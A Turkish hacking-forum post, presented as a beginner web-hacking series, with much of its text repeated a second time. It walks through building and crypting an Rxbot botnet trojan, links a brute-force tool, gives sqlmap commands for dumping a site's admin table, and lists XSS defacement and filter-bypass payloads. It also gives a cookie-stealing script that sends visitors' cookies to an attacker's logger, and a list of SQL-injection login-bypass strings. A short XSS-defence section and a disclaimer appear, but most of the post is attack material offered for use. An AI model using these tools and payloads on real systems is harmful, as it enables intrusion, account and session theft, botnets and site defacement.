SXJOKRY
Kayıtlı Üye
- Katılım
- 8 Ağustos 2025
- Mesajlar
- 17
- Tepkime puanı
- 4
- Konum
- Aksaray
- İlgi Alanlarınız
- Hacking CS2 XANTARES
- Cinsiyet
-
- Erkek
Merhaba gençler Web Hacking giriş serimize hoş geldiniz
1 - Ddos-Dos :
Denial of Service, internete bağlı bir hostun hizmetlerini geçici veya süresiz olarak aksatarak, bir makinenin veya ağ kaynaklarının asıl kullanıcılar tarafından ulaşılamamasını hedefleyen bir siber saldırıdır
gelelim ddos-dos tooluna :
Botnet Nedir ?
Botnet Karşımızdaki kurbana yedirdigimiz trojan exe mizin karşı bilgisayarda backdoor açması ile o bilgisayarı kendimize zombie sistemine cevirerek bilgisayar yonetımını komple elimize almamızdır… Oluşturdugumuz bu sistemden istedigimiz bir sisteme saldırı yapmasıdır…Kısaca mantık budur…
Botnet Kurulumu ?
Botnet kurulumu icin bize gerekli olan programlar
1 ) Microsoft Visual C++ Standart Edition
2 ) Service Pack 6 3 ) SDK
) Source kodlari
Bunlari elde ettikten ve kurduktan sonra yapmamiz gereken Source kodlarımızı rardan cıkardıktan sonra (Not:Ornek olarak ben Rxbot kullandım..) Rxbot klasorunun ıcıne gırerek Rbot.dsw dosyasını Microsoft Visual C++ Standart Edition programımız ile aciyoruz…Sol kısımında Header files altında configs.h dosyasını acıyoruz ve gerekli olan ayarlamaları yapıyoruz bunları ben videoda zaten cok acık bır sekılde belırttım…Bu degısıklıklerı yaptıktan sonra F7 tusuna basarak rBot.exe trojanımızı hazırlıyoruz…Debug klasoru ıcerısıne olusturuyor bilginiz olsun….Trojanımızı olusturduktan sonra herhangı bır crypter ıle trojanımızı antılerden kacırıyoruz ve kullanmaya baslıyoruz…
Botnet Kurulumu icin gerekli Meteryaller !!!
1 ) Microsoft Visual C++ 6.0 Standard Edition < == Download
2 ) Service Pack 6 < == Download
3 ) SDK < == Download
Botner Kurulum Videosu Detayli Anlatim, Botnet Source Kodlari ve Bot Kullanim Komutlari < == Download !
Kesinlikle Hicbiryerden Alıntı Değildir..Döküman tamamen tarafımca hazırlanmıştır…Alıntı yapıcak olursanız bile lütfen buradan alıntı yapıldığını belirtiniz..Emeğe Saygı Gösteriniz !!!
VirüsTotal :
VirusTotal
VirusTotal
VirusTotal
VirusTotal
2- Brute Force :
Kaba kuvvet saldırısı ya da İngilizce Brute-force attack, bir hackerın bir kombinasyonu doğru tahmin etme umuduyla birçok parola veya kullanıcı adı göndermesinden oluşur
Arama motoru : https://disk.yandex.com.tr/d/qi5akRbodzLRh
Program : https://s5.dosya.tc/server2/wv8swa/revshow_x64_2_7.exe.html
VirüsTotal :
VirusTotal
VirusTotal
Program kullanımı : arama motorunda dorkları tanıtıp url topladıktan sonra programa url ve password list tanıtıp start deyip bekliyoruz
3- Sqlmap :
Sqlmap python dili ile yazılmış açık kaynak kodlu,sql injection açığını tespit ve istismar eden bir araçtır. Bu araç sizin belirtmiş olduğunuz girdiler ile hedef site üzerinde, bünyesinde bulunan kombinasyonları deneyerek açık tarar. Kali Linux işletim sistemi üzerinde hazır olarak gelen bu araç, Windows işletim sistemi ve diğer Linux işletim sistemi kullanıcılarına da açıktır. İndirmek için “http://sqlmap.org/” adresine gidebilirsiniz. Bu tip araçları kullanmanın en güzel yanı el ile yapılan taramalardan daha hızlı sonuçlar çıkarması. Ama şunu unutmamak gerekir ki el ile yapılan taramalar her zaman daha iyi sonuçlar ortaya çıkarır.
Konuyu fazla uzatmadan “sqlmap” de var olan komutları ve bu araç ile yapılan örnek bir saldırıya yer verelim.
Komut satırına “sqlmap -h” yazdığımızda bu araç ile kullanılabilecek kod dizinleri karşımıza çıkıyor.
Yukarıda da gördüğümüz gibi bu araç ile ilgili var olan komutları ve açıklamalarına yer verilmiştir. Kullanımı ise mesela bir sitenin mevcut veritabanlarını bulmak istiyorsak kullanacağımız komut:”sqlmap -u http://www.hedefsite.com/index.php?id=2 –dbs” yazıyoruz.
Şimdi ise bu araç kullanarak hedef sitenin veritabanına erişip, sitenin admin paneli kullanıcı adı ve şifresine nasıl erişebileceğimize bakalım. Herhangi bir olumsuz durum yaşanmaması sebebiyle örnek olarak kullandığım sitenin bilgilerini sileceğim.
İlk olarak komut satırına sqlmap -u http://www.hedefsite.com/index.php?id=2 –dbs kodunu yazıyoruz.
Yukarı da gördüğümüz gibi ilgili sitenin veritabanını buldu. Bizim işlem yapacağımız yer information_**** diye devam eden değil. Bunun bir üstündeki veri tabanı ile işlem yapacağız. Parametreye değer girerken ismini komple kapattığım veri tabanı ismini giriniz. Şimdi ise bulunan veri tabanında hangi tablolar var bir göz atalım. Bunun için “sqlmap -u http://www.hedefsite.com/index.php?id=2 -D veritabani_adi –tables” komutunu yazıyoruz.
Yukarıda arama yaptığımız veri tabanında 7 adet tablo buldu ama burada adı “admin” olan veri tabanı tablosu benim gözüme takıldı bakalım burada neler varmış. Bunun için komut satırına “sqlmap -u http://www.hedefsite.com/index.php?id=2 -T admin –columns” yazıp gelen sonuçları inceleyelim.
Burada karşımıza 3 tane sütun çıkıyor. İlgili sitenin admin id, kullanıcı adı ve şifrelerinin kayıtlı olduğu sütunlar karşımıza çıkıyor. Buradaki sütunların hepsine bir göz atalım bunun için komut satırına “sqlmap -u http://hedefsite.com/index.php?id=2 -T admin -C id,password,username –dump” yazıp ilgili sütunlar da ne gibi bilgiler saklanıyor bakalım.
asdasfas
Yukarı da ilgili sitenin admin bilgilerine ulaştık. Bazı sistemlerde buradaki parolalar şifreli bir şekilde tutulmaktadır. Bu yazı sizin kendi sistemlerinizi olası saldırılardan korumak ve olası zafiyetler hakkında bilgilendirmek amacı ile yazılmıştır
4 Xss :
XSS Nedir Nasıl XSS Açıklı Siteler Hacklenir Kavramlar ve Daha Fazlası?
“CSS” olarak da bilinen “xss”( Cascading Style Sheets ile karıştırılan Cross Site Scripting) web uygulamalarında sıklıkla karşılaşılan bir açıktır. xss saldırgana kötü niyetli kodlar eklemesine imkan tanımaktadır. xss saldırılarının birçok çeşidi mevcuttur. Şimdi ben burada en çok kullanılan 3 tanesi üzerinde duracağım.
Bahsetmek istediğim ilk saldırı turu URL xss’dir. Bu yöntem xss’in sayfada kalmayacağı anlamına gelir. Bu durumda xss, sadece kodu alıp “submit” ettiğimizde çalışacaktır. Bunu kendi lehimize nasıl kullanırız bundan daha çok bahsedeceğiz.
İkinci saldırı girdi alanlarındadır. Datayı nereye eklerseniz ekleyin çoğunlukla xss olur. Örnek olarak bir arama motoru kullanarak bir site bulduk. Arama kutucuğuna “hacker” diye yazın ve aratın. Sayfa yüklendiğinde eğer derse ki; “hacker” için 100 sonuç bulundu, veriyi sayfada gösterdiğini göreceksiniz. Şimdi ya kodu çalıştırırsak? Bu saldırıda PHP kodu çalıştırmak mümkün değildir ancak HTML ve JavaScript kodlarını çalıştırmak mümkündür. Bu arada bu yönteme dikkat edin sunucuda kalmayacaktır.
Üçüncü saldırı yöntemi; bu yöntem ile kodu ilave edebilirsiniz ve kod sitede kalıcı olacaktır.
PHP ve HTML çalıştırıp çalıştıramayacağımıza bağlı olan iki çeşit kodumuz var. Eğer PHP’yi enjekte edersek aynı HTML’yi de enjekte edebiliriz. Bu tarz saldırılar genellikle blog’larda ve profillerde bulunur. Forumlar ise çoğu yerine veri ekleyebildiğiniz ve verilerin eklenilen yerde kaldığı alanlardır. HTML, PHP’den çok farklıdır. HTML bilgisayarınıza “download” edilir ve tarayıcınızda bunu çözümler ( bu nedenle sayfa kaynakları görüntülenebilir). PHP ile de kod, scriptin barındırıldığı sunucu üzerinde çözümlenir, daha sonra veri tarayıcıya geri gönderilir. PHP enjeksiyon için bu durum çok nadirdir. Not: PHP kod asla HTML sayfaya enjekte edilemez.
Bölüm 2 - xss Açıklarını Bulma
Bu açıkları bulabilmek için Blog’ları, Forum’ları, Shoutbox’ları, yorum kutularını ve arama kutucuklarını deneyerek başlayabilirsiniz. Aslında burada bahsedilenlerden daha fazla örnek vermek mümkündür.
Google Dork’ları daha kolay bulmak için kullanılabilir. Örnek olarak google.com girerek inurl:”search.php?q=” yazabilirsiniz. Simdi bu bulunabilen çok genel bir sayfadır ve birçok sonuç elde edebilirsiniz. Daha fazla saldırı bulabilmek için diğer bolüme geçin.
Aynı zamanda çoğu sitenin xss açığı bulunduğunu unutmayın ve bunu bulabilmek için sadece iyi bir göz ve birazda filtrelemeye nasıl bypass yapılacağı hakkında bilgi sahibi olmak yeterlidir.
Bölüm 3 - xss Üzerine Temel Kavramlar
Simdi en çok kullanılan xss olmak üzere en genelinden öğrenmeye başlayalım.
En yaygın olanı <******>alert("xss")<!--******-->.
Bu kod “xss” tırnak işaretleri olmaksızın, kolaylıkla düzenlenebilir seklinde bir “popup” ikazı verecektir.
Bu nedenle, bahsettiğimiz eyleri hatırladığınızı varsayarak bundan bir önceki konuya geri döndüğümüzde, search.php?q= bunu basitçe bir web sitesi üzerinde deneyebiliriz.
http://site.com/search.php?q=<******>alert("xss")<!--******-->
Büyük bir olasılıkla çalışacaktır ancak yinede çalışmazsa sorun değil, baksa sitelerde de değişik varyasyonlarını deneyebilirsiniz.( ben çoğu kişinin, sadece JavaScript değil HTML kodlar da ekleyebileceklerinin farkında olduklarını sanmıyorum)
http://site.com/search.php?q=<br><br>xss
Eğer kalın fontla yazılmış metni ve haber baslığını görürseniz açık bulunduğunu biliyorsunuzdur ve artık daha sonra izah edeceğimiz yöntemleri de kullanabilirisiniz.
Bölüm 4 - Saldırı Yöntemleri
Evet, artık xss nasıl çalışır bunu öğrendik, simdi de bazı xss deface metotlarını izah edebiliriz. Deface için kullanılabilecek birçok yöntem vardır ve ben bunlardan en etkili ve en yaygın olanları üzerinde duracağım.
İlki IMG SRC olanıdır. HTML bilmeyenler için IMG SRC, kendisine link’lenmiş olan resmi web sitesinde göstermek için kullanılan bir tag’dır.
<img src="http://site.com/yourDefaceIMAGE.png">
Eğer link’i geçerli bir resim linki ile değiştirir, kaydeder ve çalıştırırsanız ne demek istediğimi daha iyi anlayacaksınız.
Şimdi diyelim ki Shoutbox, Commentbox veya siz verilerinizi girdikten ve onayladıktan sonra, girdiğiniz verileri gösteren herhangi bir yer buldunuz. Resmi sayfada gösterebilmek için aşağıda vermiş olduğum link’i ekleyebilirsiniz.
<img src="http://site.com/yourDefaceIMAGE.png">
Diğer tag’lara gerek yok çünkü sayfa onları zaten barındırmaktadır (çok ıstınsa durumlarda barındırmayabilirde).
Bu resminizin daha büyük görünmesini sağlar ve site net bir şekilde hacklenmiş olur.
Diğer bir yöntemde flash videoların kullanımıdır. Aşağıdaki yöntemle aynıdır ancak biraz daha afilli bir yöntemdir.
<embed src="http://site.com/xss">
Burada ise, kendisine link’lenmiş olan flash video çalıştırılacaktır.
Ya da Pop veya yönlendirme de kullanıyor olabilir
<******>window.open( "http://www.google.com/" )<!--******-->
Bölüm 5 - Çerez (Cookie) Çalma
En etkili yöntem olduğu için bunu eklemek istedim.
Önce color=#2e6382http://G0t-Root.net/tools/cookie.php (ben baktım link çalışmıyor)
Sitesinden cookie logger’i indirelim. Simdi dosyayı edindik ve a.php seklindeki dosyamızı serverımıza upload ediyoruz. Log.txt dosyasını oluşturmayı var chmod 777 yapmayı unutmayın. Simdi ise herhangi bir saldırıyı gerçekleştirebileceğimiz, xss açığı olan bir site
bulun. Simdi ise su kodu ekleyin;
window.******** = "http://yourServer.com/cookielogger.php?c="+********.cookie
veya
********.******** = "http://yourServer.com/cookielogger.php?c="+********.cookie
Bundan sonra kullanıcı eğer siteyi ziyaret ederse cookie loggeri yemiş olacaktır. Gerekli bilgiler siteye gönderilmiş ve cookie’ler çalınmış olacaktır.
İkinci kısım ise daha gizli kapaklıdır.
Cookie’ler için dosyanıza bakın ve sonra kullanıcının oturumunu yönlendirebilirsiniz.
Ancak eğer derseniz ki ya bizim sitemizin bu tarz bir saldırı olanağı yok, sadece datayı bir kez gösteriyor ve onu saklamıyorsa?
Diyelim ki bizim search.php?q= diye bir sayfa elimizde, biz bunu aşağıdaki kodu kullanarak ondan zararlı bir url elde edebiliriz ve belki hex belkide base64 onu encode eder ve insanlar kodu goremezler
color=#2e6382http://site.com/search.php?q=********.******** = "http://yourServer.com/cookielogger.php?c="+********.cookie
Bölüm 6 - Filtreleme İşlemini ByPass Etmek
Çoğu sitede acık var gözükebilir ancak kod çalıştırmaz, bunu çözebilmek için bu bolumu iyi not edin. Filtreleme işlemini ByPass etmek için kullanılan bazı genel yöntemler;
’)alert(’xss’);
or
");alert(’xss’);
Bunlar açık olan bir serverda bu kodun <******>alert("xss")<!--******--> yaptığının aynısını yaparlar. Datayı onaylamadan önce Hexing yada base 64 encoding etmeyi deneyebilirsiniz.
Su hususa dikkat edin; xss’i test etmek için (“xss”) ikazı kullanmak hiç de iyi bir pratik yapma yöntemi değildir çünkü ben xss harflerini engelleyen sitelerin olduğunu biliyorum.
Filtrelemeyi bypass edebilmek için diğer yollar;
<****** type=text/javascript>alert("CyberWarrior")<!--******-->
<******>alert("CyberWarrior")<!--******-->;
<******>alert("CyberWarrior");<!--******-->
<******>alert("CyberWarrior"/)<!--******-->
<******>var var = 1; alert(var)<!--******-->
Bölüm 7 - İleri Seviye xss
Bu bolümde sağlam olan belli başlı yöntemleri inceleyeceğiz ki, kendimin bile daha kullanıldığına hiç rastlamadığım yöntemler, eminim beğeneceksiniz.
“Sihirli İşaretlerin” kullanıma acık olduğu ve bu nedenle bazı komutları gereksiz kılan birçok site gördüm. Ancak kesirli sayıları kullanarak onları ASCII’ye çeviren bir yönteme rastladım. Kesirli sayıları ASCII’ye çevirmek için gerekli fonksiyonları içeren bütün bir tabloyu
color=#2e6382Ascii Table - ASCII character codes and html, octal, hex and decimal chart conversion sitesinden edinebilirsiniz. Bu tablo size neyi yazmak istiyorsanız onu yazmanıza yardımcı olacaktır. Ben kendi örneğimde "turkishajan" yazacağım ve aşağıdakilerde bunun için gerekli kodlar;
67 121 98 101 114 87 97 114 114 105 111 114
Evet, şimdi string’imizin ondalık değerlerini elde ettik, bilmemiz gereken şey JavaScript’in bunu hangi fonksiyona dönüştürdüğüdür.
String.fromCharCode()
Bu kod bu tarz şeyler için uygundur, kurulumu kolaydır. Bunu da aşağıdaki kendi argümanlarımdan vereceğim.
String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114
)
Evet simdi
"String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114)"
“CyberWarrior” ifadesinin JAVA (ASCII)’deki seklidir.
Ve bunu uyarı vb şeylerle kullanmak için simgelere ihtiyacınız olmaz çünkü zaten bunun kendisi değişken olarak görev yapar.
<******>alert(String.fromCharCode(67, 121, 98, 101, 114, 87, 97, 114, 114, 105, 111, 114))<!--******-->
Şimdi bu durumda "CyberWarrior" seklinde gösterilecektir. Ve bu yöntem sihirli işaretler denilen imleçleri bypass etmede bir numaradır.
Bir sonraki bolüme devam etmeden önce, yine değişkenlerin kullanıldığı başka bir yöntemden daha bahsetmek istiyorum.
Söyle bir şey yazalım;
var myVar = 1
burada myVar 1 demenin daha uzun bir seklidir.
Değişkenleri xss’de kendi lehimize kullanmak için, aşağıdaki şekilde yazabiliriz;
<******>var myVar = 1; alert(myVar)<!--******-->
Burada değişkenlerin içerikleri herhangi bir işaret (quote) kullanmadan gösterilecektir.
Bölüm 8 - xss Güvenliği
Bu kısım web yazılımcıları için hazırlanmıştır. Hazırladığınız kodlara nasıl güvenlik sağlayabilirsiniz ondan bahsedeceğim.
Eğer ******’lerinizde xss açıklarına rastlarsanız, güvenliğini sağlamak çok basittir. Aşağıdaki koda söyle bir göz atın;
if(isset($_POST[’form’])){echo "" .$_POST[’form’]. "";}
Diyelim ki $_POST[’from’] değişkeni herhangi bir girdi kutucuğundan geliyordu ve sız de xss saldırısına maruz kaldınız. Sonraki ise bunun güvenliğini sağlamak için çok basit bir yöntem;
$charset=’UTF-8’; $data = htmlentities ($_POST[’form’], ENT_NOQUOTES, $charset);
if(isset($data)){echo "" .$data. "";}
Bu satır muhtemel tüm kodları alacak ve onları < gibi şeylere dönüştürerek çalışmaz hala getirecektir.
HTML girişlerini kullanırken herhangi bir farklılık göze çarpmayacak ();
Ayrıca çok yaygın olan başka bir fonksiyon daha var, striptags(), daha fazla bilgiyi php.net/striptags’da bulabilirsiniz. Tam sayı değişkenlerin (yanı içinde her zaman için tamsayı değeri bulunduran değişkenler) güvenliğini nasıl sağlayacağınıza dair size göstereceğim diğer bir yöntem de;
$this = $_GET[’id’];
echo "görüntülediğiniz" . $this . "blog";
Herkese Kolay Gelsin Beyler ! Bu konu da bu kadar dı sıkıntı olursa facebook grubumuzdan bana ulaşarak mesaj atabilirsiniz !
5- Bypass
Bypass en kolay ve en kısa yoldan site hacklemek için kullanılan bir sistemdir.
Admin panelindeki id ve şifre kısımlarını Bug'a sokarak panele girmemizi sağlar.
Kısaca Admin Ve Şifre Yerine Gelebilecek ve şifre Doğrulamasını Rahatlıkla Atlatabileceğiniz Bir Açık veya Bir Methot Diyebiliriz.
Nasıl Yapılır ?
Bunlardan Birini Admin ve Şifre Yerine Yazanız Yeterlidir.
' or ' 1=1
' or ' 1
' or '
'=' 'or'
''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
hi") or ("a"="a
'hi' or 'x'='x';
x' or 1=1 or 'x'='y
\x27\x4F\x52 SELECT *
\x27\x6F\x72 SELECT *
'or select *
İyi Forumlar
SXJOKRY İYİ GÜNLER DİLEMEK
1 - Ddos-Dos :
Denial of Service, internete bağlı bir hostun hizmetlerini geçici veya süresiz olarak aksatarak, bir makinenin veya ağ kaynaklarının asıl kullanıcılar tarafından ulaşılamamasını hedefleyen bir siber saldırıdır
gelelim ddos-dos tooluna :
Botnet Nedir ?
Botnet Karşımızdaki kurbana yedirdigimiz trojan exe mizin karşı bilgisayarda backdoor açması ile o bilgisayarı kendimize zombie sistemine cevirerek bilgisayar yonetımını komple elimize almamızdır… Oluşturdugumuz bu sistemden istedigimiz bir sisteme saldırı yapmasıdır…Kısaca mantık budur…
Botnet Kurulumu ?
Botnet kurulumu icin bize gerekli olan programlar
1 ) Microsoft Visual C++ Standart Edition
2 ) Service Pack 6 3 ) SDK
) Source kodlari
Bunlari elde ettikten ve kurduktan sonra yapmamiz gereken Source kodlarımızı rardan cıkardıktan sonra (Not:Ornek olarak ben Rxbot kullandım..) Rxbot klasorunun ıcıne gırerek Rbot.dsw dosyasını Microsoft Visual C++ Standart Edition programımız ile aciyoruz…Sol kısımında Header files altında configs.h dosyasını acıyoruz ve gerekli olan ayarlamaları yapıyoruz bunları ben videoda zaten cok acık bır sekılde belırttım…Bu degısıklıklerı yaptıktan sonra F7 tusuna basarak rBot.exe trojanımızı hazırlıyoruz…Debug klasoru ıcerısıne olusturuyor bilginiz olsun….Trojanımızı olusturduktan sonra herhangı bır crypter ıle trojanımızı antılerden kacırıyoruz ve kullanmaya baslıyoruz…
Botnet Kurulumu icin gerekli Meteryaller !!!
1 ) Microsoft Visual C++ 6.0 Standard Edition < == Download
2 ) Service Pack 6 < == Download
3 ) SDK < == Download
Botner Kurulum Videosu Detayli Anlatim, Botnet Source Kodlari ve Bot Kullanim Komutlari < == Download !
Kesinlikle Hicbiryerden Alıntı Değildir..Döküman tamamen tarafımca hazırlanmıştır…Alıntı yapıcak olursanız bile lütfen buradan alıntı yapıldığını belirtiniz..Emeğe Saygı Gösteriniz !!!
VirüsTotal :
VirusTotal
VirusTotal
VirusTotal
VirusTotal
VirusTotal
VirusTotal
VirusTotal
VirusTotal
2- Brute Force :
Kaba kuvvet saldırısı ya da İngilizce Brute-force attack, bir hackerın bir kombinasyonu doğru tahmin etme umuduyla birçok parola veya kullanıcı adı göndermesinden oluşur
Arama motoru : https://disk.yandex.com.tr/d/qi5akRbodzLRh
Program : https://s5.dosya.tc/server2/wv8swa/revshow_x64_2_7.exe.html
VirüsTotal :
VirusTotal
VirusTotal
VirusTotal
VirusTotal
Program kullanımı : arama motorunda dorkları tanıtıp url topladıktan sonra programa url ve password list tanıtıp start deyip bekliyoruz
3- Sqlmap :
Sqlmap python dili ile yazılmış açık kaynak kodlu,sql injection açığını tespit ve istismar eden bir araçtır. Bu araç sizin belirtmiş olduğunuz girdiler ile hedef site üzerinde, bünyesinde bulunan kombinasyonları deneyerek açık tarar. Kali Linux işletim sistemi üzerinde hazır olarak gelen bu araç, Windows işletim sistemi ve diğer Linux işletim sistemi kullanıcılarına da açıktır. İndirmek için “http://sqlmap.org/” adresine gidebilirsiniz. Bu tip araçları kullanmanın en güzel yanı el ile yapılan taramalardan daha hızlı sonuçlar çıkarması. Ama şunu unutmamak gerekir ki el ile yapılan taramalar her zaman daha iyi sonuçlar ortaya çıkarır.
Konuyu fazla uzatmadan “sqlmap” de var olan komutları ve bu araç ile yapılan örnek bir saldırıya yer verelim.
Komut satırına “sqlmap -h” yazdığımızda bu araç ile kullanılabilecek kod dizinleri karşımıza çıkıyor.
Yukarıda da gördüğümüz gibi bu araç ile ilgili var olan komutları ve açıklamalarına yer verilmiştir. Kullanımı ise mesela bir sitenin mevcut veritabanlarını bulmak istiyorsak kullanacağımız komut:”sqlmap -u http://www.hedefsite.com/index.php?id=2 –dbs” yazıyoruz.
Şimdi ise bu araç kullanarak hedef sitenin veritabanına erişip, sitenin admin paneli kullanıcı adı ve şifresine nasıl erişebileceğimize bakalım. Herhangi bir olumsuz durum yaşanmaması sebebiyle örnek olarak kullandığım sitenin bilgilerini sileceğim.
İlk olarak komut satırına sqlmap -u http://www.hedefsite.com/index.php?id=2 –dbs kodunu yazıyoruz.
Yukarı da gördüğümüz gibi ilgili sitenin veritabanını buldu. Bizim işlem yapacağımız yer information_**** diye devam eden değil. Bunun bir üstündeki veri tabanı ile işlem yapacağız. Parametreye değer girerken ismini komple kapattığım veri tabanı ismini giriniz. Şimdi ise bulunan veri tabanında hangi tablolar var bir göz atalım. Bunun için “sqlmap -u http://www.hedefsite.com/index.php?id=2 -D veritabani_adi –tables” komutunu yazıyoruz.
Yukarıda arama yaptığımız veri tabanında 7 adet tablo buldu ama burada adı “admin” olan veri tabanı tablosu benim gözüme takıldı bakalım burada neler varmış. Bunun için komut satırına “sqlmap -u http://www.hedefsite.com/index.php?id=2 -T admin –columns” yazıp gelen sonuçları inceleyelim.
Burada karşımıza 3 tane sütun çıkıyor. İlgili sitenin admin id, kullanıcı adı ve şifrelerinin kayıtlı olduğu sütunlar karşımıza çıkıyor. Buradaki sütunların hepsine bir göz atalım bunun için komut satırına “sqlmap -u http://hedefsite.com/index.php?id=2 -T admin -C id,password,username –dump” yazıp ilgili sütunlar da ne gibi bilgiler saklanıyor bakalım.
asdasfas
Yukarı da ilgili sitenin admin bilgilerine ulaştık. Bazı sistemlerde buradaki parolalar şifreli bir şekilde tutulmaktadır. Bu yazı sizin kendi sistemlerinizi olası saldırılardan korumak ve olası zafiyetler hakkında bilgilendirmek amacı ile yazılmıştır
4 Xss :
XSS Nedir Nasıl XSS Açıklı Siteler Hacklenir Kavramlar ve Daha Fazlası?
“CSS” olarak da bilinen “xss”( Cascading Style Sheets ile karıştırılan Cross Site Scripting) web uygulamalarında sıklıkla karşılaşılan bir açıktır. xss saldırgana kötü niyetli kodlar eklemesine imkan tanımaktadır. xss saldırılarının birçok çeşidi mevcuttur. Şimdi ben burada en çok kullanılan 3 tanesi üzerinde duracağım.
Bahsetmek istediğim ilk saldırı turu URL xss’dir. Bu yöntem xss’in sayfada kalmayacağı anlamına gelir. Bu durumda xss, sadece kodu alıp “submit” ettiğimizde çalışacaktır. Bunu kendi lehimize nasıl kullanırız bundan daha çok bahsedeceğiz.
İkinci saldırı girdi alanlarındadır. Datayı nereye eklerseniz ekleyin çoğunlukla xss olur. Örnek olarak bir arama motoru kullanarak bir site bulduk. Arama kutucuğuna “hacker” diye yazın ve aratın. Sayfa yüklendiğinde eğer derse ki; “hacker” için 100 sonuç bulundu, veriyi sayfada gösterdiğini göreceksiniz. Şimdi ya kodu çalıştırırsak? Bu saldırıda PHP kodu çalıştırmak mümkün değildir ancak HTML ve JavaScript kodlarını çalıştırmak mümkündür. Bu arada bu yönteme dikkat edin sunucuda kalmayacaktır.
Üçüncü saldırı yöntemi; bu yöntem ile kodu ilave edebilirsiniz ve kod sitede kalıcı olacaktır.
PHP ve HTML çalıştırıp çalıştıramayacağımıza bağlı olan iki çeşit kodumuz var. Eğer PHP’yi enjekte edersek aynı HTML’yi de enjekte edebiliriz. Bu tarz saldırılar genellikle blog’larda ve profillerde bulunur. Forumlar ise çoğu yerine veri ekleyebildiğiniz ve verilerin eklenilen yerde kaldığı alanlardır. HTML, PHP’den çok farklıdır. HTML bilgisayarınıza “download” edilir ve tarayıcınızda bunu çözümler ( bu nedenle sayfa kaynakları görüntülenebilir). PHP ile de kod, scriptin barındırıldığı sunucu üzerinde çözümlenir, daha sonra veri tarayıcıya geri gönderilir. PHP enjeksiyon için bu durum çok nadirdir. Not: PHP kod asla HTML sayfaya enjekte edilemez.
Bölüm 2 - xss Açıklarını Bulma
Bu açıkları bulabilmek için Blog’ları, Forum’ları, Shoutbox’ları, yorum kutularını ve arama kutucuklarını deneyerek başlayabilirsiniz. Aslında burada bahsedilenlerden daha fazla örnek vermek mümkündür.
Google Dork’ları daha kolay bulmak için kullanılabilir. Örnek olarak google.com girerek inurl:”search.php?q=” yazabilirsiniz. Simdi bu bulunabilen çok genel bir sayfadır ve birçok sonuç elde edebilirsiniz. Daha fazla saldırı bulabilmek için diğer bolüme geçin.
Aynı zamanda çoğu sitenin xss açığı bulunduğunu unutmayın ve bunu bulabilmek için sadece iyi bir göz ve birazda filtrelemeye nasıl bypass yapılacağı hakkında bilgi sahibi olmak yeterlidir.
Bölüm 3 - xss Üzerine Temel Kavramlar
Simdi en çok kullanılan xss olmak üzere en genelinden öğrenmeye başlayalım.
En yaygın olanı <******>alert("xss")<!--******-->.
Bu kod “xss” tırnak işaretleri olmaksızın, kolaylıkla düzenlenebilir seklinde bir “popup” ikazı verecektir.
Bu nedenle, bahsettiğimiz eyleri hatırladığınızı varsayarak bundan bir önceki konuya geri döndüğümüzde, search.php?q= bunu basitçe bir web sitesi üzerinde deneyebiliriz.
http://site.com/search.php?q=<******>alert("xss")<!--******-->
Büyük bir olasılıkla çalışacaktır ancak yinede çalışmazsa sorun değil, baksa sitelerde de değişik varyasyonlarını deneyebilirsiniz.( ben çoğu kişinin, sadece JavaScript değil HTML kodlar da ekleyebileceklerinin farkında olduklarını sanmıyorum)
http://site.com/search.php?q=<br><br>xss
Eğer kalın fontla yazılmış metni ve haber baslığını görürseniz açık bulunduğunu biliyorsunuzdur ve artık daha sonra izah edeceğimiz yöntemleri de kullanabilirisiniz.
Bölüm 4 - Saldırı Yöntemleri
Evet, artık xss nasıl çalışır bunu öğrendik, simdi de bazı xss deface metotlarını izah edebiliriz. Deface için kullanılabilecek birçok yöntem vardır ve ben bunlardan en etkili ve en yaygın olanları üzerinde duracağım.
İlki IMG SRC olanıdır. HTML bilmeyenler için IMG SRC, kendisine link’lenmiş olan resmi web sitesinde göstermek için kullanılan bir tag’dır.
<img src="http://site.com/yourDefaceIMAGE.png">
Eğer link’i geçerli bir resim linki ile değiştirir, kaydeder ve çalıştırırsanız ne demek istediğimi daha iyi anlayacaksınız.
Şimdi diyelim ki Shoutbox, Commentbox veya siz verilerinizi girdikten ve onayladıktan sonra, girdiğiniz verileri gösteren herhangi bir yer buldunuz. Resmi sayfada gösterebilmek için aşağıda vermiş olduğum link’i ekleyebilirsiniz.
<img src="http://site.com/yourDefaceIMAGE.png">
Diğer tag’lara gerek yok çünkü sayfa onları zaten barındırmaktadır (çok ıstınsa durumlarda barındırmayabilirde).
Bu resminizin daha büyük görünmesini sağlar ve site net bir şekilde hacklenmiş olur.
Diğer bir yöntemde flash videoların kullanımıdır. Aşağıdaki yöntemle aynıdır ancak biraz daha afilli bir yöntemdir.
<embed src="http://site.com/xss">
Burada ise, kendisine link’lenmiş olan flash video çalıştırılacaktır.
Ya da Pop veya yönlendirme de kullanıyor olabilir
<******>window.open( "http://www.google.com/" )<!--******-->
Bölüm 5 - Çerez (Cookie) Çalma
En etkili yöntem olduğu için bunu eklemek istedim.
Önce color=#2e6382http://G0t-Root.net/tools/cookie.php (ben baktım link çalışmıyor)
Sitesinden cookie logger’i indirelim. Simdi dosyayı edindik ve a.php seklindeki dosyamızı serverımıza upload ediyoruz. Log.txt dosyasını oluşturmayı var chmod 777 yapmayı unutmayın. Simdi ise herhangi bir saldırıyı gerçekleştirebileceğimiz, xss açığı olan bir site
bulun. Simdi ise su kodu ekleyin;
window.******** = "http://yourServer.com/cookielogger.php?c="+********.cookie
veya
********.******** = "http://yourServer.com/cookielogger.php?c="+********.cookie
Bundan sonra kullanıcı eğer siteyi ziyaret ederse cookie loggeri yemiş olacaktır. Gerekli bilgiler siteye gönderilmiş ve cookie’ler çalınmış olacaktır.
İkinci kısım ise daha gizli kapaklıdır.
Cookie’ler için dosyanıza bakın ve sonra kullanıcının oturumunu yönlendirebilirsiniz.
Ancak eğer derseniz ki ya bizim sitemizin bu tarz bir saldırı olanağı yok, sadece datayı bir kez gösteriyor ve onu saklamıyorsa?
Diyelim ki bizim search.php?q= diye bir sayfa elimizde, biz bunu aşağıdaki kodu kullanarak ondan zararlı bir url elde edebiliriz ve belki hex belkide base64 onu encode eder ve insanlar kodu goremezler
color=#2e6382http://site.com/search.php?q=********.******** = "http://yourServer.com/cookielogger.php?c="+********.cookie
